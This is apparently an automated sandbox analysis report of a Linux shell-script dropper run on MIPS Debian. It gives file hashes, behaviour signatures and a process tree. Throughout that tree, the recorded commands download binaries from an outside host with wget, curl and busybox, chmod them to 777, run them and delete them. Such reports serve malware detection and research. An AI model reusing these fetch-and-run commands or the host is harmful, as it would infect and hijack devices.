Analysis
-
max time kernel
139s -
max time network
137s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21/10/2024, 01:32
Static task
static1
Behavioral task
behavioral1
Sample
9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh
-
Size
10KB
-
MD5
b319003c3c601274b8d3c96e303370c0
-
SHA1
9fe9064eb8767a3ea42c466bf21bce04eee50006
-
SHA256
9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d
-
SHA512
d215c64d523bfa6118135a76e27c20d1e7c53b3875d78412c3a25647e0075ee43bce16c44821f92b0acf65cd485b6f3067fc9beadb5daa282a1ba39768c33394
-
SSDEEP
192:voNYIHKWYUzPf7v6qfo0M+//YJSw1zPL36qfo0G//YJXIYIHKWe:voOq76qfo0M+//YJSwh6qfo0G//YJX9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 861 chmod 952 chmod 987 chmod 793 chmod 833 chmod 840 chmod 734 chmod 903 chmod 980 chmod 741 chmod 847 chmod 966 chmod 973 chmod 854 chmod 945 chmod 1001 chmod 896 chmod 910 chmod 924 chmod 882 chmod 938 chmod 959 chmod 917 chmod 931 chmod 994 chmod 868 chmod 875 chmod 889 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK 735 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK /tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo 742 RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo /tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 794 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 /tmp/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK 834 oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK /tmp/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha 841 3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha /tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP 848 wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP /tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23 855 mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23 /tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR 862 xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR /tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is 869 Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is /tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C 876 R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C /tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai 883 RST5ihgvCHq053iGjxnCyKylug69j9npai /tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN 890 v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN /tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF 897 mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF /tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk 904 R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk /tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23 911 mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23 /tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR 918 xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR /tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is 925 Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is /tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C 932 R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C /tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP 939 wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP /tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN 946 v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN /tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF 953 mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF /tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk 960 R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk /tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai 967 RST5ihgvCHq053iGjxnCyKylug69j9npai /tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo 974 RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo /tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 981 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 /tmp/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK 988 oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK /tmp/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha 995 3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha /tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK 1002 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 930 busybox 794 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 902 busybox 865 curl 886 curl 921 curl 935 curl 982 rm 721 curl 792 busybox 977 curl 981 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 984 curl 986 busybox 878 wget 955 wget 851 curl 860 busybox 899 wget 916 busybox 956 curl 970 curl 836 wget 846 busybox 892 wget 993 busybox 737 wget 745 curl 881 busybox 895 busybox 900 curl 913 wget 928 curl 958 busybox 744 wget 864 wget 951 busybox 1000 busybox 906 wget 934 wget 923 busybox 942 curl 944 busybox 997 wget 740 busybox 857 wget 907 curl 941 wget 962 wget 972 busybox 990 wget 705 wget 839 busybox 731 busybox 843 wget 937 busybox 963 curl 979 busybox 991 curl 867 busybox 888 busybox 797 curl 850 wget 872 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk curl File opened for modification /tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C curl File opened for modification /tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF curl File opened for modification /tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP curl File opened for modification /tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF curl File opened for modification /tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN curl File opened for modification /tmp/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK curl File opened for modification /tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is curl File opened for modification /tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP curl File opened for modification /tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai curl File opened for modification /tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo curl File opened for modification /tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23 curl File opened for modification /tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C curl File opened for modification /tmp/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha curl File opened for modification /tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23 curl File opened for modification /tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk curl File opened for modification /tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 curl File opened for modification /tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK curl File opened for modification /tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6 curl File opened for modification /tmp/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha curl File opened for modification /tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is curl File opened for modification /tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR curl File opened for modification /tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK curl File opened for modification /tmp/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK curl File opened for modification /tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai curl File opened for modification /tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN curl File opened for modification /tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo curl File opened for modification /tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR curl
Processes
-
/tmp/9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh/tmp/9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh1⤵PID:700
-
/bin/rm/bin/rm bins.sh2⤵PID:703
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- System Network Configuration Discovery
PID:705
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:721
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- System Network Configuration Discovery
PID:731
-
-
/bin/chmodchmod 777 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK./0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵PID:736
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- System Network Configuration Discovery
PID:737
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- System Network Configuration Discovery
PID:740
-
-
/bin/chmodchmod 777 RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo./RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵PID:743
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:744
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:792
-
-
/bin/chmodchmod 777 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6./7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:794
-
-
/bin/rmrm 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵PID:795
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:796
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:832
-
-
/bin/chmodchmod 777 oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK./oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- Executes dropped EXE
PID:834
-
-
/bin/rmrm oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:835
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- System Network Configuration Discovery
PID:836
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- System Network Configuration Discovery
PID:839
-
-
/bin/chmodchmod 777 3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha./3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm 3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵PID:842
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- System Network Configuration Discovery
PID:843
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- System Network Configuration Discovery
PID:846
-
-
/bin/chmodchmod 777 wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP./wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵PID:849
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- System Network Configuration Discovery
PID:850
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:853
-
-
/bin/chmodchmod 777 mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23./mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:856
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- System Network Configuration Discovery
PID:857
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- System Network Configuration Discovery
PID:860
-
-
/bin/chmodchmod 777 xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR./xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵PID:863
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- System Network Configuration Discovery
PID:864
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- System Network Configuration Discovery
PID:867
-
-
/bin/chmodchmod 777 Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is./Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵PID:870
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:871
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:874
-
-
/bin/chmodchmod 777 R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C./R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:877
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- System Network Configuration Discovery
PID:878
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- System Network Configuration Discovery
PID:881
-
-
/bin/chmodchmod 777 RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai./RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵PID:884
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵PID:885
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- System Network Configuration Discovery
PID:888
-
-
/bin/chmodchmod 777 v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN./v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵PID:891
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- System Network Configuration Discovery
PID:892
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- System Network Configuration Discovery
PID:895
-
-
/bin/chmodchmod 777 mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF./mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵PID:898
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- System Network Configuration Discovery
PID:899
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- System Network Configuration Discovery
PID:902
-
-
/bin/chmodchmod 777 R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk./R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵PID:905
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- System Network Configuration Discovery
PID:906
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:909
-
-
/bin/chmodchmod 777 mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23./mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:912
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- System Network Configuration Discovery
PID:913
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- System Network Configuration Discovery
PID:916
-
-
/bin/chmodchmod 777 xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR./xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵PID:919
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵PID:920
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- System Network Configuration Discovery
PID:923
-
-
/bin/chmodchmod 777 Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is./Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵PID:926
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:927
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- System Network Configuration Discovery
PID:930
-
-
/bin/chmodchmod 777 R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C./R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:933
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- System Network Configuration Discovery
PID:934
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- System Network Configuration Discovery
PID:937
-
-
/bin/chmodchmod 777 wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- File and Directory Permissions Modification
PID:938
-
-
